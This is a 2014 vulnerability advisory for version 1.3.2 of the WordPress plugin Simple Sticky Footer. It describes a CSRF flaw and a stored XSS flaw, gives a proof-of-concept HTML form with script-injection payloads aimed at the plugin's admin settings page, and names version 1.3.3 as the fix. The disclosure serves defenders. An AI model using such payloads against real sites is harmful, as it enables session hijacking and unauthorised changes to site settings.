Home / exploits WordPress Simple Sticky Footer 1.3.2 CSRF / XSS
Posted on 13 December 2014
Title: WordPress 'Simple Sticky Footer' plugin - CSRF/XSS Version: 1.3.2 Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej Date: 2014/12/12 Download: https://wordpress.org/plugins/simple-sticky-footer/ Notified WordPress: 2014/11/27 ---------------------------------------------------------------- ## Description: ---------------------------------------------------------------- Simple Sticky Footer is a lightweight plugin, it allows to promote/advertise a WP Page (rich-text document) as a sticky footer (always on top div). ## CSRF: ---------------------------------------------------------------- It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. ## Stored XSS: ---------------------------------------------------------------- Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. PoC: Log in to a vulnerable site and press submit on this form: <form method="POST" action="http://[Domain]/wp-admin/themes.php?page=simple-simple-sticky-footer"> <input type="text" name="page_id" value="7"><br /> <input type="text" name="simple_sf_width" value="'/><script>alert(1)</script>"><br /> <input type="text" name="simple_sf_effect" value="fade"><br /> <input type="text" name="simple_sf_delay" value="0"><br /> <input type="text" name="simple_sf_style" value="</textarea><script>alert(2)</script>"><br /> <input type="text" name="submit" value="save"><br /> <input type="submit"> </form> ## Solution ---------------------------------------------------------------- Update to version 1.3.3.
